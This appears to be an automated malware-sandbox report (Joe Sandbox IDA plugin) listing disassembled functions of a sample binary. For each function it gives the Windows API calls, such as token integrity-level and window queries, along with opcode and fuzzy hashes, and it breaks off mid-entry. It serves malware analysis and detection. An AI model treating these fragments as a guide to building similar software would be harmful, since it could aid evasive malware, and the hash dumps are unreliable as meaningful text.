                                    • Instruction Fuzzy Hash: AB21A5B1904618DADB209F64CC85AEE7BBCFF84324F108616E929EA1C0D77099C5CF51
                                    APIs
                                    • IsWindow.USER32(00000000), ref: 00800951
                                    • GetForegroundWindow.USER32 ref: 00800968
                                    • GetDC.USER32(00000000), ref: 008009A4
                                    • GetPixel.GDI32(00000000,?,00000003), ref: 008009B0
                                    • ReleaseDC.USER32(00000000,00000003), ref: 008009E8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Window$ForegroundPixelRelease
                                    • String ID:
                                    • API String ID: 4156661090-0
                                    • Opcode ID: c0ba7a66334d84f76218ed7a2f8a99dd3e96737c93aee6dc09c91825c3965d68
                                    • Instruction ID: 01ca856eaec3ccf3c047c4b7360b62bbfa92bf6be7a91ab0e7a2e98d2b060b1f
                                    • Opcode Fuzzy Hash: c0ba7a66334d84f76218ed7a2f8a99dd3e96737c93aee6dc09c91825c3965d68
                                    • Instruction Fuzzy Hash: 09216F75A40204EFD704EF69D888AAEBBE9FF48700F04846CE94AD7362CB74AC44CB50
                                    APIs
                                    • GetEnvironmentStringsW.KERNEL32 ref: 007BCDC6
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007BCDE9
                                      • Part of subcall function 007B3820: RtlAllocateHeap.NTDLL(00000000,?,00851444,?,0079FDF5,?,?,0078A976,00000010,00851440,007813FC,?,007813C6,?,00781129), ref: 007B3852
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 007BCE0F
                                    • _free.LIBCMT ref: 007BCE22
                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 007BCE31
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                    • String ID:
                                    • API String ID: 336800556-0
                                    • Opcode ID: 0087f3baaa8ccf578c95e1fab48d37bc83866ee84785209c9243f08d749d8c23
                                    • Instruction ID: f1e4d1078c866acac49d171436ffa4a7b3ba5d836f6da763bbecea7171c7907e
                                    • Opcode Fuzzy Hash: 0087f3baaa8ccf578c95e1fab48d37bc83866ee84785209c9243f08d749d8c23
                                    • Instruction Fuzzy Hash: 0401AC72601215BF23221A766C4CEFB7A6DEEC6BA1315812DFD05DB201DA69CD0181B0
                                    APIs
                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00799693
                                    • SelectObject.GDI32(?,00000000), ref: 007996A2
                                    • BeginPath.GDI32(?), ref: 007996B9
                                    • SelectObject.GDI32(?,00000000), ref: 007996E2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ObjectSelect$BeginCreatePath
                                    • String ID:
                                    • API String ID: 3225163088-0
                                    • Opcode ID: 8add9507d66094a061643c90d5743ebd58ed8290f16c05a1d91eb3746916fe41
                                    • Instruction ID: ccebb07edff5e89c243afaa1a6462908edcaa10c3f2d1e3b82dff212def6876d
                                    • Opcode Fuzzy Hash: 8add9507d66094a061643c90d5743ebd58ed8290f16c05a1d91eb3746916fe41
                                    • Instruction Fuzzy Hash: 72218E70802305EBEF119F68EC0C7E93FB9BB11366F90421AF611A61B0D3789896CB94
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _memcmp
                                    • String ID:
                                    • API String ID: 2931989736-0
                                    • Opcode ID: 8130a9ebd0716f57a027d418478d9b99944c6805f8017133639c339da4ec6759
                                    • Instruction ID: 0395001dc78b94ec1290b0d845a8b61869424c17fada55309a0048fd3ce73b4b
                                    • Opcode Fuzzy Hash: 8130a9ebd0716f57a027d418478d9b99944c6805f8017133639c339da4ec6759
                                    • Instruction Fuzzy Hash: 5D01B5A264665DFBE60895129D92FFB735CEF653A8F404120FE14DE242F76CED6082E0
                                    APIs
                                    • GetLastError.KERNEL32(?,?,?,007AF2DE,007B3863,00851444,?,0079FDF5,?,?,0078A976,00000010,00851440,007813FC,?,007813C6), ref: 007B2DFD
                                    • _free.LIBCMT ref: 007B2E32
                                    • _free.LIBCMT ref: 007B2E59
                                    • SetLastError.KERNEL32(00000000,00781129), ref: 007B2E66
                                    • SetLastError.KERNEL32(00000000,00781129), ref: 007B2E6F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ErrorLast$_free
                                    • String ID:
                                    • API String ID: 3170660625-0
                                    • Opcode ID: 38609b85ab30fc0217fc290d74179ea4df062b92db8b33c76d7441d183838151
                                    • Instruction ID: f66e5b491132a8e571bdf40024fde31f4b612509159dc81aa709516049457201
                                    • Opcode Fuzzy Hash: 38609b85ab30fc0217fc290d74179ea4df062b92db8b33c76d7441d183838151
                                    • Instruction Fuzzy Hash: B901A436247600B7C61367766C4DFEB266DBFD57A5B254528F825E22A3EE6CCC034520
                                    APIs
                                    • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,007DFF41,80070057,?,?,?,007E035E), ref: 007E002B
                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,007DFF41,80070057,?,?), ref: 007E0046
                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,007DFF41,80070057,?,?), ref: 007E0054
                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,007DFF41,80070057,?), ref: 007E0064
                                    • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,007DFF41,80070057,?,?), ref: 007E0070
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                    • String ID:
                                    • API String ID: 3897988419-0
                                    • Opcode ID: aac994029c1bca59346712b295beb93249b8f2b05b1e7eb8329a0fa2d1d4a840
                                    • Instruction ID: a271e1769c04bc6074e95bd57b008a62d997c91b6318fd1db12111c8fc705627
                                    • Opcode Fuzzy Hash: aac994029c1bca59346712b295beb93249b8f2b05b1e7eb8329a0fa2d1d4a840
                                    • Instruction Fuzzy Hash: 6501A276641204BFDB109F6ADC48BEA7AEDFF48751F148124F905D2210D7B9DD809BA0
                                    APIs
                                    • QueryPerformanceCounter.KERNEL32(?), ref: 007EE997
                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 007EE9A5
                                    • Sleep.KERNEL32(00000000), ref: 007EE9AD
                                    • QueryPerformanceCounter.KERNEL32(?), ref: 007EE9B7
                                    • Sleep.KERNEL32 ref: 007EE9F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                    • String ID:
                                    • API String ID: 2833360925-0
                                    • Opcode ID: 36604d7488409927ad76028cf331fb50a37772074ed4226ef5386746cd7ed971
                                    • Instruction ID: 16720f3751bf5d20307deb613a9fa99140773353ef093ca0da622886eb139ea2
                                    • Opcode Fuzzy Hash: 36604d7488409927ad76028cf331fb50a37772074ed4226ef5386746cd7ed971
                                    • Instruction Fuzzy Hash: C4012D31C42629EBCF009FE6DC59AEDBBB8FF0D711F004956E502B2242DB38A555C7A2
                                    APIs
                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007E1114
                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,007E0B9B,?,?,?), ref: 007E1120
                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,007E0B9B,?,?,?), ref: 007E112F
                                    • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,007E0B9B,?,?,?), ref: 007E1136
                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007E114D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                    • String ID:
                                    • API String ID: 842720411-0
                                    • Opcode ID: 50edceb4fa2c679649cd26a8afa29ce7cc00042bc0e94e9d5a0309da5b3d9cc4
                                    • Instruction ID: 229be363d4c89534255d54cbd9d5add60d48d7910524a7c5d1834e68327c4036
                                    • Opcode Fuzzy Hash: 50edceb4fa2c679649cd26a8afa29ce7cc00042bc0e94e9d5a0309da5b3d9cc4
                                    • Instruction Fuzzy Hash: 32018179141305BFDB114F69DC49EAA3F6EFF89360B104418FA41C3350DB71DC008A60
                                    APIs
                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007E0FCA
                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007E0FD6
                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007E0FE5
                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007E0FEC
                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007E1002
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                    • String ID:
                                    • API String ID: 44706859-0
                                    • Opcode ID: e9933e43a4635f0926c2849fc92468ecf61831e58d1817047000ebdc18e0b959
                                    • Instruction ID: 1dd4dbd48c1602b6e574fad669b2479bc65def72f319cba6780f031e900f502a
                                    • Opcode Fuzzy Hash: e9933e43a4635f0926c2849fc92468ecf61831e58d1817047000ebdc18e0b959
                                    • Instruction Fuzzy Hash: 4FF06D39281351FBDB214FA5EC4EF963BAEFF89762F518814FA45C7291CA74DC408A60
                                    APIs
                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007E102A
                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007E1036
                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007E1045
                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007E104C
                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007E1062
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                    • String ID:
                                    • API String ID: 44706859-0
                                    • Opcode ID: b0f94a90a22193061d533c9c45db5383103023d8c8f297b28f9b6f28164b360b
                                    • Instruction ID: 4fddd2027e33444b9c344cf1330d96769388fb5eaca4f5dd2e6d23f1d5512954
                                    • Opcode Fuzzy Hash: b0f94a90a22193061d533c9c45db5383103023d8c8f297b28f9b6f28164b360b
                                    • Instruction Fuzzy Hash: 67F06D39281351FBDB215FA5EC49F963BAEFF89761F514424FA45C7250CA74D8408A60
                                    APIs
                                    • CloseHandle.KERNEL32(?,?,?,?,007F017D,?,007F32FC,?,00000001,007C2592,?), ref: 007F0324
                                    • CloseHandle.KERNEL32(?,?,?,?,007F017D,?,007F32FC,?,00000001,007C2592,?), ref: 007F0331
                                    • CloseHandle.KERNEL32(?,?,?,?,007F017D,?,007F32FC,?,00000001,007C2592,?), ref: 007F033E
                                    • CloseHandle.KERNEL32(?,?,?,?,007F017D,?,007F32FC,?,00000001,007C2592,?), ref: 007F034B
                                    • CloseHandle.KERNEL32(?,?,?,?,007F017D,?,007F32FC,?,00000001,007C2592,?), ref: 007F0358
                                    • CloseHandle.KERNEL32(?,?,?,?,007F017D,?,007F32FC,?,00000001,007C2592,?), ref: 007F0365
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CloseHandle
                                    • String ID:
                                    • API String ID: 2962429428-0
                                    • Opcode ID: 499539308f80a0a38a123145a5bc356f0454ca18f78ac29b892419ac032d28ea
                                    • Instruction ID: 4e949499c78b93224659c07066d21a47202d7c1200fc615fc31a6cce10e49588
                                    • Opcode Fuzzy Hash: 499539308f80a0a38a123145a5bc356f0454ca18f78ac29b892419ac032d28ea
                                    • Instruction Fuzzy Hash: 1501A276800B19DFC7309F66D880822FBF9BF503153158A3FD29652A32C375A954DF80
                                    APIs
                                    • _free.LIBCMT ref: 007BD752
                                      • Part of subcall function 007B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,007BD7D1,00000000,00000000,00000000,00000000,?,007BD7F8,00000000,00000007,00000000,?,007BDBF5,00000000), ref: 007B29DE
                                      • Part of subcall function 007B29C8: GetLastError.KERNEL32(00000000,?,007BD7D1,00000000,00000000,00000000,00000000,?,007BD7F8,00000000,00000007,00000000,?,007BDBF5,00000000,00000000), ref: 007B29F0
                                    • _free.LIBCMT ref: 007BD764
                                    • _free.LIBCMT ref: 007BD776
                                    • _free.LIBCMT ref: 007BD788
                                    • _free.LIBCMT ref: 007BD79A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 786257c0feddde2caddd62ab2c99692170c9085b6d66d7440b6fc13182aedca3
                                    • Instruction ID: 925097350212c5befe6de3ed7e9be8ee7f45642cfaf8fec8e28d0b6e8a94de8b
                                    • Opcode Fuzzy Hash: 786257c0feddde2caddd62ab2c99692170c9085b6d66d7440b6fc13182aedca3
                                    • Instruction Fuzzy Hash: 1AF01D36546208BB8675EB68F9CAEDA7BDDBB45710BA40C15F048E7512DB38FC808A64
                                    APIs
                                    • GetDlgItem.USER32(?,000003E9), ref: 007E5C58
                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 007E5C6F
                                    • MessageBeep.USER32(00000000), ref: 007E5C87
                                    • KillTimer.USER32(?,0000040A), ref: 007E5CA3
                                    • EndDialog.USER32(?,00000001), ref: 007E5CBD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                    • String ID:
                                    • API String ID: 3741023627-0
                                    • Opcode ID: 245d23b333ca388e209f579e1fb55f66ba4792b4787f000733879e573613b466
                                    • Instruction ID: 6fbfcce958ca66ca14eb48273b4d938cefef0585e0b651e5d5b0c54a2bf7f13c
                                    • Opcode Fuzzy Hash: 245d23b333ca388e209f579e1fb55f66ba4792b4787f000733879e573613b466
                                    • Instruction Fuzzy Hash: 7B01D630540B08ABEB205B11DD5EFE677BCBF18B09F00155DA183A10F1DBF4A984CBA0
                                    APIs
                                    • _free.LIBCMT ref: 007B22BE
                                      • Part of subcall function 007B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,007BD7D1,00000000,00000000,00000000,00000000,?,007BD7F8,00000000,00000007,00000000,?,007BDBF5,00000000), ref: 007B29DE
                                      • Part of subcall function 007B29C8: GetLastError.KERNEL32(00000000,?,007BD7D1,00000000,00000000,00000000,00000000,?,007BD7F8,00000000,00000007,00000000,?,007BDBF5,00000000,00000000), ref: 007B29F0
                                    • _free.LIBCMT ref: 007B22D0
                                    • _free.LIBCMT ref: 007B22E3
                                    • _free.LIBCMT ref: 007B22F4
                                    • _free.LIBCMT ref: 007B2305
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 6c5806332116443a9ca505849f6d194056ad1dbaf2bf377bfabc65d95730bd1d
                                    • Instruction ID: ad98b0a96d322ceac5f0b5569675e274d468adc7d209b168e53f29f6742b7430
                                    • Opcode Fuzzy Hash: 6c5806332116443a9ca505849f6d194056ad1dbaf2bf377bfabc65d95730bd1d
                                    • Instruction Fuzzy Hash: 4FF05474403310DB8A52EF54BC05AD83B68F719752B010A1AF418E22B6CB3C1412DFE5
                                    APIs
                                    • EndPath.GDI32(?), ref: 007995D4
                                    • StrokeAndFillPath.GDI32(?,?,007D71F7,00000000,?,?,?), ref: 007995F0
                                    • SelectObject.GDI32(?,00000000), ref: 00799603
                                    • DeleteObject.GDI32 ref: 00799616
                                    • StrokePath.GDI32(?), ref: 00799631
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                    • String ID:
                                    • API String ID: 2625713937-0
                                    • Opcode ID: 8a7fc72b44dbaf2d485ab07ae1cd0efc8ee736812b312faea3762a865e0173b9
                                    • Instruction ID: f1fc517904cb1dca07ba8c1c13e1d211f2275fffb57f38441f5926a032b8a7b3
                                    • Opcode Fuzzy Hash: 8a7fc72b44dbaf2d485ab07ae1cd0efc8ee736812b312faea3762a865e0173b9
                                    • Instruction Fuzzy Hash: CCF01430046708EBEF225F69ED1CBE93F69BB05322F848218F569950F0D73889A5DF64
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: __freea$_free
                                    • String ID: a/p$am/pm
                                    • API String ID: 3432400110-3206640213
                                    • Opcode ID: 196ea4e2c4c23f5a3d2112e8ce896bb5ce9c6b65aa1e7f3fa70e2c9da7031250
                                    • Instruction ID: 0ee09cadc423a9b37853a08bb5d23707b6113077f83bd8f1d2a1cc6ba10f49ef
                                    • Opcode Fuzzy Hash: 196ea4e2c4c23f5a3d2112e8ce896bb5ce9c6b65aa1e7f3fa70e2c9da7031250
                                    • Instruction Fuzzy Hash: 8AD1C331A0020ADADB249F68C869BFAB7B5FF06700FE84159E9019B651E77D9D80CB91
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 007B8B6E
                                    • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 007B8B7A
                                    • __dosmaperr.LIBCMT ref: 007B8B81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
